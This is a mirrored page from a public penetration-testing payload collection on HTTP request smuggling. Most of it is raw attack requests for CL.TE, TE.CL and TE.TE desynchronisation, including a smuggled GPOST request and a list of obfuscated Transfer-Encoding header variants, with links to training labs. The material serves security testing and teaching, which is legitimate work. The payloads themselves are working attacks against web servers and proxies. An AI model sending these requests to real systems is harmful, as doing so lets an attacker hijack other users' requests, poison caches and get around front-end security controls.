mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-29 15:55:25 +00:00
110 lines
3.0 KiB
Markdown
110 lines
3.0 KiB
Markdown
# Request Smuggling
|
|
|
|
## Summary
|
|
|
|
* [Tools](#tools)
|
|
* [CL.TE vulnerabilities](#cl.te-vulnerabilities)
|
|
* [TE.CL vulnerabilities](#te.cl-vulnerabilities)
|
|
* [TE.TE behavior: obfuscating the TE header](#te.te-behavior-obfuscating-the-te-header)
|
|
* [References](#references)
|
|
|
|
## Tools
|
|
|
|
* [HTTP Request Smuggler / BApp Store](https://portswigger.net/bappstore/aaaa60ef945341e8a450217a54a11646)
|
|
* [Smuggler](https://github.com/defparam/smuggler)
|
|
|
|
## CL.TE vulnerabilities
|
|
|
|
> The front-end server uses the Content-Length header and the back-end server uses the Transfer-Encoding header.
|
|
|
|
```powershell
|
|
POST / HTTP/1.1
|
|
Host: vulnerable-website.com
|
|
Content-Length: 13
|
|
Transfer-Encoding: chunked
|
|
|
|
0
|
|
|
|
SMUGGLED
|
|
```
|
|
|
|
Example:
|
|
|
|
```powershell
|
|
POST / HTTP/1.1
|
|
Host: domain.example.com
|
|
Connection: keep-alive
|
|
Content-Type: application/x-www-form-urlencoded
|
|
Content-Length: 6
|
|
Transfer-Encoding: chunked
|
|
|
|
0
|
|
|
|
G
|
|
```
|
|
|
|
Challenge: https://portswigger.net/web-security/request-smuggling/lab-basic-cl-te
|
|
|
|
## TE.CL vulnerabilities
|
|
|
|
> The front-end server uses the Transfer-Encoding header and the back-end server uses the Content-Length header.
|
|
|
|
```powershell
|
|
POST / HTTP/1.1
|
|
Host: vulnerable-website.com
|
|
Content-Length: 3
|
|
Transfer-Encoding: chunked
|
|
|
|
8
|
|
SMUGGLED
|
|
0
|
|
```
|
|
|
|
Example:
|
|
|
|
```powershell
|
|
POST / HTTP/1.1
|
|
Host: domain.example.com
|
|
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86
|
|
Content-Length: 4
|
|
Connection: close
|
|
Content-Type: application/x-www-form-urlencoded
|
|
Accept-Encoding: gzip, deflate
|
|
|
|
5c
|
|
GPOST / HTTP/1.1
|
|
Content-Type: application/x-www-form-urlencoded
|
|
Content-Length: 15
|
|
x=1
|
|
0
|
|
|
|
|
|
```
|
|
|
|
:warning: To send this request using Burp Repeater, you will first need to go to the Repeater menu and ensure that the "Update Content-Length" option is unchecked.You need to include the trailing sequence \r\n\r\n following the final 0.
|
|
|
|
Challenge: https://portswigger.net/web-security/request-smuggling/lab-basic-te-cl
|
|
|
|
## TE.TE behavior: obfuscating the TE header
|
|
|
|
> The front-end and back-end servers both support the Transfer-Encoding header, but one of the servers can be induced not to process it by obfuscating the header in some way.
|
|
|
|
```powershell
|
|
Transfer-Encoding: xchunked
|
|
Transfer-Encoding : chunked
|
|
Transfer-Encoding: chunked
|
|
Transfer-Encoding: x
|
|
Transfer-Encoding:[tab]chunked
|
|
[space]Transfer-Encoding: chunked
|
|
X: X[\n]Transfer-Encoding: chunked
|
|
Transfer-Encoding
|
|
: chunked
|
|
```
|
|
|
|
Challenge: https://portswigger.net/web-security/request-smuggling/lab-ofuscating-te-header
|
|
|
|
## References
|
|
|
|
* [PortSwigger - Request Smuggling Tutorial](https://portswigger.net/web-security/request-smuggling) and [PortSwigger - Request Smuggling Reborn](https://portswigger.net/research/http-desync-attacks-request-smuggling-reborn)
|
|
* [A Pentester's Guide to HTTP Request Smuggling - Busra Demir - 2020, October 16](https://blog.cobalt.io/a-pentesters-guide-to-http-request-smuggling-8b7bf0db1f0)
|